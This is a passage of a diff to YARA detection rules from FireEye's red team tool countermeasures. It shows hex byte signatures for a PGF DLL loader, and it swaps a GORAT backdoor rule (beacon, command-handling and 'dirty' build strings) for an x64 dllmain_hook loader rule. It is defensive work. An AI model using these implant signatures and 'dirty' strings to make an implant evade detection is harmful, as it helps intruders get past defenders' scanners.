89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 7C AD 00 00 83 EC 08 89 45 DC EB 93 8B 45 D0 89 04 24 A1 44 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 83 7D E4 00 74 06 83 7D E0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 AD 01 00 00 C7 04 24 62 40 41 6A A1 78 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 C7 44 24 04 6E 40 41 6A 89 04 24 A1 7C A1 41 6A FF D0 83 EC 08 89 45 CC 89 E8 89 45 D8 8D 85 6C F9 FF FF 89 44 24 04 8D 85 70 F9 FF FF 89 04 24 A1 70 A1 41 6A FF D0 83 EC 08 C7 45 D4 00 00 00 00 8B 55 D8 8B 85 6C F9 FF FF 39 C2 0F 83 F5 00 00 00 8B 45 D8 8B 00 3D FF 0F 00 00 0F 86 D8 00 00 00 8B 45 D8 8B 00 39 45 CC 73 19 8B 45 D8 8B 00 8B 55 CC 81 C2 00 10 00 00 39 D0 73 07 C7 45 D4 01 00 00 00 83 7D D4 00 0F 84 AF 00 00 00 8B 45 D8 8B 00 39 45 E4 0F 83 A1 00 00 00 8B 45 D8 8B 00 8B 4D E4 8B 55 E0 01 CA 39 D0 0F 83 8C 00 00 00 B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 50 F9 FF FF 83 C0 04 39 D0 72 F2 8B 45 D8 8B 00 C7 44 24 08 1C 00 00 00 8D 95 50 F9 FF FF 89 54 24 04 89 04 24 A1 C8 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 0C 8B 85 64 F9 FF FF 83 E0 20 85 C0 74 2E 8B 45 D8 8B 00 C7 44 24 04 30 14 3C 6A 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 59 FC FF FF C7 85 10 F9 FF FF 00 00 00 00 EB 58 90 EB 01 90 83 45 D8 04 E9 FA FE FF FF 8B 45 E4 89 45 C8 8B 45 C8 8B 40 3C 89 C2 8B 45 E4 01 D0 89 45 C4 8B 45 C4 8B 50 28 8B 45 E4 01 D0 89 45 C0 C7 44 24 04 30 14 3C 6A 8B 45 C0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 FF FB FF FF C7 85 10 F9 FF FF 01 00 00 00 8D 85 9C FD FF FF 89 C1 E8 55 BC 01 00 83 BD 10 F9 FF FF 01 EB 70 8B 95 1C F9 FF FF 8B 85 18 F9 FF FF 85 C0 74 0C 83 E8 01 85 C0 74 2D 83 E8 01 0F 0B 89 95 10 F9 FF FF 8D 45 BF 89 C1 E8 40 08 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 98 A6 00 00 89 95 10 F9 FF FF 8D 85 9C FD FF FF 89 C1 E8 F5 BB 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 6D A6 00 00 90 8D 85 14 F9 FF FF 89 04 24 E8 6E A3 00 00 8D 65 F4 5B 5E 5F 5D C3 }
+		$cond3 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 2C F9 FF FF F0 EF D5 63 C7 85 30 F9 FF FF CC FF D5 63 8D 85 34 F9 FF FF 89 28 BA 28 1B D4 63 89 50 04 89 60 08 8D 85 14 F9 FF FF 89 04 24 E8 BF A6 00 00 A1 64 A1 D9 63 C7 85 18 F9 FF FF FF FF FF FF FF D0 C7 44 24 08 04 01 00 00 8D 95 B6 FD FF FF 89 54 24 04 89 04 24 E8 BC AE 00 00 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 8B 03 00 00 8D 45 BF 89 C1 E8 5A 0B 01 00 8D 85 9C FD FF FF 8D 55 BF 89 54 24 04 8D 95 B6 FD FF FF 89 14 24 C7 85 18 F9 FF FF 01 00 00 00 89 C1 E8 E3 B5 01 00 83 EC 08 8D 45 BF 89 C1 E8 56 0B 01 00 A1 68 A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 89 44 24 04 C7 04 24 08 00 00 00 E8 55 AE 00 00 83 EC 08 89 45 D0 83 7D D0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 8C 02 00 00 C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 85 74 F9 FF FF 28 04 00 00 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 F3 AD 00 00 83 EC 08 89 45 DC 83 7D DC 00 74 67 8D 85 9C FD FF FF C7 44 24 04 00 00 00 00 8D 95 74 F9 FF FF 83 C2 20 89 14 24 89 C1 E8 86 FF 00 00 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 12 8B 85 88 F9 FF FF 89 45 E4 8B 85 8C F9 FF FF 89 45 E0 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 88 AD 00 00 83 EC 08 89 45 DC EB 93 8B 45 D0 89 04 24 A1 44 A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 83 7D E4 00 74 06 83 7D E0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 AD 01 00 00 C7 04 24 7E 40 D9 63 A1 7C A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 C7 44 24 04 8A 40 D9 63 89 04 24 A1 80 A1 D9 63 FF D0 83 EC 08 89 45 CC 89 E8 89 45 D8 8D 85 6C F9 FF FF 89 44 24 04 8D 85 70 F9 FF FF 89 04 24 A1 70 A1 D9 63 FF D0 83 EC 08 C7 45 D4 00 00 00 00 8B 55 D8 8B 85 6C F9 FF FF 39 C2 0F 83 F5 00 00 00 8B 45 D8 8B 00 3D FF 0F 00 00 0F 86 D8 00 00 00 8B 45 D8 8B 00 39 45 CC 73 19 8B 45 D8 8B 00 8B 55 CC 81 C2 00 10 00 00 39 D0 73 07 C7 45 D4 01 00 00 00 83 7D D4 00 0F 84 AF 00 00 00 8B 45 D8 8B 00 39 45 E4 0F 83 A1 00 00 00 8B 45 D8 8B 00 8B 4D E4 8B 55 E0 01 CA 39 D0 0F 83 8C 00 00 00 B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 50 F9 FF FF 83 C0 04 39 D0 72 F2 8B 45 D8 8B 00 C7 44 24 08 1C 00 00 00 8D 95 50 F9 FF FF 89 54 24 04 89 04 24 A1 C8 A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 0C 8B 85 64 F9 FF FF 83 E0 20 85 C0 74 2E 8B 45 D8 8B 00 C7 44 24 04 30 14 D4 63 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 59 FC FF FF C7 85 10 F9 FF FF 00 00 00 00 EB 58 90 EB 01 90 83 45 D8 04 E9 FA FE FF FF 8B 45 E4 89 45 C8 8B 45 C8 8B 40 3C 89 C2 8B 45 E4 01 D0 89 45 C4 8B 45 C4 8B 50 28 8B 45 E4 01 D0 89 45 C0 C7 44 24 04 30 14 D4 63 8B 45 C0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 FF FB FF FF C7 85 10 F9 FF FF 01 00 00 00 8D 85 9C FD FF FF 89 C1 E8 61 BC 01 00 83 BD 10 F9 FF FF 01 EB 70 8B 95 1C F9 FF FF 8B 85 18 F9 FF FF 85 C0 74 0C 83 E8 01 85 C0 74 2D 83 E8 01 0F 0B 89 95 10 F9 FF FF 8D 45 BF 89 C1 E8 4C 08 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 A4 A6 00 00 89 95 10 F9 FF FF 8D 85 9C FD FF FF 89 C1 E8 01 BC 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 79 A6 00 00 90 8D 85 14 F9 FF FF 89 04 24 E8 7A A3 00 00 8D 65 F4 5B 5E 5F 5D C3 }
+		$cond4 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 ?? ?? ?? ?? 90 EE 01 6D C7 85 ?? ?? ?? ?? 6C FE 01 6D 8D 85 ?? ?? ?? ?? 89 28 BA CC 19 00 6D 89 50 ?? 89 60 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF FF D0 C7 44 24 ?? 04 01 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8D 95 ?? ?? ?? ?? 89 14 24 C7 85 ?? ?? ?? ?? 01 00 00 00 89 C1 E8 ?? ?? ?? ?? 83 EC 08 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 89 44 24 ?? C7 04 24 08 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 28 04 00 00 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 74 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 8D 95 ?? ?? ?? ?? 83 C2 20 89 14 24 89 C1 E8 ?? ?? ?? ?? 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? EB ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 04 24 0C 40 05 6D A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 C7 44 24 ?? 18 40 05 6D 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 89 45 ?? 89 E8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 C7 45 ?? 00 00 00 00 8B 55 ?? 8B 85 ?? ?? ?? ?? 39 C2 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 73 ?? 8B 45 ?? 8B 00 8B 55 ?? 81 C2 00 10 00 00 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 8B 4D ?? 8B 55 ?? 01 CA 39 D0 0F 83 ?? ?? ?? ?? B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 ?? ?? ?? ?? 83 C0 04 39 D0 72 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 1C 00 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 0C 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 30 14 00 6D 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 90 EB ?? 90 83 45 ?? 04 E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 C2 8B 45 ?? 01 D0 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 01 D0 89 45 ?? C7 44 24 ?? 30 14 00 6D 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 01 00 00 00 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 01 EB ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 01 85 C0 74 ?? 83 E8 01 0F 0B 89 95 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 }
+		$cond5 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 ?? ?? ?? ?? B0 EF 3D 6A C7 85 ?? ?? ?? ?? 8C FF 3D 6A 8D 85 ?? ?? ?? ?? 89 28 BA F4 1A 3C 6A 89 50 ?? 89 60 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF FF D0 C7 44 24 ?? 04 01 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8D 95 ?? ?? ?? ?? 89 14 24 C7 85 ?? ?? ?? ?? 01 00 00 00 89 C1 E8 ?? ?? ?? ?? 83 EC 08 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 89 44 24 ?? C7 04 24 08 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 28 04 00 00 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 74 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 8D 95 ?? ?? ?? ?? 83 C2 20 89 14 24 89 C1 E8 ?? ?? ?? ?? 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? EB ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 04 24 62 40 41 6A A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 C7 44 24 ?? 6E 40 41 6A 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 89 45 ?? 89 E8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 C7 45 ?? 00 00 00 00 8B 55 ?? 8B 85 ?? ?? ?? ?? 39 C2 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 73 ?? 8B 45 ?? 8B 00 8B 55 ?? 81 C2 00 10 00 00 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 8B 4D ?? 8B 55 ?? 01 CA 39 D0 0F 83 ?? ?? ?? ?? B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 ?? ?? ?? ?? 83 C0 04 39 D0 72 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 1C 00 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 0C 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 30 14 3C 6A 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 90 EB ?? 90 83 45 ?? 04 E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 C2 8B 45 ?? 01 D0 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 01 D0 89 45 ?? C7 44 24 ?? 30 14 3C 6A 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 01 00 00 00 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 01 EB ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 01 85 C0 74 ?? 83 E8 01 0F 0B 89 95 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 }
+		$cond6 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 ?? ?? ?? ?? F0 EF D5 63 C7 85 ?? ?? ?? ?? CC FF D5 63 8D 85 ?? ?? ?? ?? 89 28 BA 28 1B D4 63 89 50 ?? 89 60 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF FF D0 C7 44 24 ?? 04 01 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8D 95 ?? ?? ?? ?? 89 14 24 C7 85 ?? ?? ?? ?? 01 00 00 00 89 C1 E8 ?? ?? ?? ?? 83 EC 08 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 89 44 24 ?? C7 04 24 08 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 28 04 00 00 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 74 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 8D 95 ?? ?? ?? ?? 83 C2 20 89 14 24 89 C1 E8 ?? ?? ?? ?? 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? EB ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 04 24 7E 40 D9 63 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 C7 44 24 ?? 8A 40 D9 63 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 89 45 ?? 89 E8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 C7 45 ?? 00 00 00 00 8B 55 ?? 8B 85 ?? ?? ?? ?? 39 C2 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 73 ?? 8B 45 ?? 8B 00 8B 55 ?? 81 C2 00 10 00 00 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 8B 4D ?? 8B 55 ?? 01 CA 39 D0 0F 83 ?? ?? ?? ?? B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 ?? ?? ?? ?? 83 C0 04 39 D0 72 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 1C 00 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 0C 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 30 14 D4 63 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 90 EB ?? 90 83 45 ?? 04 E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 C2 8B 45 ?? 01 D0 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 01 D0 89 45 ?? C7 44 24 ?? 30 14 D4 63 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 01 00 00 00 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 01 EB ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 01 85 C0 74 ?? 83 E8 01 0F 0B 89 95 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 }
 
 	condition:
-		filesize < 50KB and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and any of them
 }
-rule FIREEYE_RT_APT_Backdoor_Win_GORAT_3 : FILE
+rule FIREEYE_RT_APT_Loader_Win64_PGF_3 : FILE
 {
 	meta:
-		description = "This rule uses the same logic as FE_APT_Trojan_Win_GORAT_1_FEBeta with the addition of one check, to look for strings that are known to be in the Gorat implant when a certain cleaning script is not run against it."
+		description = "PGF payload, generated rule based on symfunc/8a2f2236fdfaa3583ab89076025c6269. Identifies dllmain_hook x64 payloads."
 		author = "FireEye"
-		id = "94c195b5-b8e8-56a7-bc11-dbbe2f969b06"
+		id = "340ea6d4-7111-520c-9bd4-0465a43ea235"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_3.yar#L4-L39"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_3.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "995120b35db9d2f36d7d0ae0bfc9c10d"
-		logic_hash = "592745e9c67f7adf0cd48975ed1497211d8efeff29b52be1e2d082b9a648bb57"
+		hash = "3bb34ebd93b8ab5799f4843e8cc829fa"
+		logic_hash = "fd82bdec54a76eed12cc8820ef39899f31ea6df21d905530a0d53770b3d9901b"
 		score = 75
-		quality = 28
+		quality = 75
 		tags = "FILE"
-		rev = 5
+		rev = 4
 
 	strings:
-		$dirty1 = "fireeye" ascii nocase wide
-		$dirty2 = "kulinacs" ascii nocase wide
-		$dirty3 = "RedFlare" ascii nocase wide
-		$dirty4 = "gorat" ascii nocase wide
-		$dirty5 = "flare" ascii nocase wide
-		$go1 = "go.buildid" ascii wide
-		$go2 = "Go build ID:" ascii wide
-		$json1 = "json:\"pid\"" ascii wide
-		$json2 = "json:\"key\"" ascii wide
-		$json3 = "json:\"agent_time\"" ascii wide
-		$json4 = "json:\"rid\"" ascii wide
-		$json5 = "json:\"ports\"" ascii wide
-		$json6 = "json:\"agent_platform\"" ascii wide
-		$rat = "rat" ascii wide
-		$str1 = "handleCommand" ascii wide
-		$str2 = "sendBeacon" ascii wide
-		$str3 = "rat.AgentVersion" ascii wide
-		$str4 = "rat.Core" ascii wide
-		$str5 = "rat/log" ascii wide
-		$str6 = "rat/comms" ascii wide
-		$str7 = "rat/modules" ascii wide
-		$str8 = "murica" ascii wide
-		$str9 = "master secret" ascii wide
-		$str10 = "TaskID" ascii wide
-		$str11 = "rat.New" ascii wide
+		$cond1 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 80 8B 06 00 FF D0 48 89 C1 48 8D 85 98 FD FF FF 41 B8 04 01 00 00 48 89 C2 E8 5A B4 00 00 85 C0 0F 94 C0 84 C0 0F 85 16 03 00 00 48 8D 45 AF 48 89 C1 E8 E9 FE 00 00 48 8D 4D AF 48 8D 95 98 FD FF FF 48 8D 85 78 FD FF FF 49 89 C8 48 89 C1 E8 AC 96 01 00 48 8D 45 AF 48 89 C1 E8 F0 FE 00 00 48 8B 05 25 8B 06 00 FF D0 89 C2 B9 08 00 00 00 E8 6B B4 00 00 48 89 45 D0 48 83 7D D0 00 75 0A BB 00 00 00 00 E9 6C 02 00 00 48 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 C7 85 38 F9 FF FF 38 04 00 00 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 AA B3 00 00 89 45 E8 83 7D E8 00 74 57 48 8D 85 38 F9 FF FF 48 8D 50 30 48 8D 85 78 FD FF FF 41 B8 00 00 00 00 48 89 C1 E8 61 F3 00 00 48 83 F8 FF 0F 95 C0 84 C0 74 14 48 8B 85 50 F9 FF FF 48 89 45 F0 8B 85 58 F9 FF FF 89 45 EC 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 4F B3 00 00 89 45 E8 EB A3 48 8B 45 D0 48 89 C1 48 8B 05 20 8A 06 00 FF D0 48 83 7D F0 00 74 06 83 7D EC 00 75 0A BB 00 00 00 00 E9 B9 01 00 00 48 8D 0D 0E C8 05 00 48 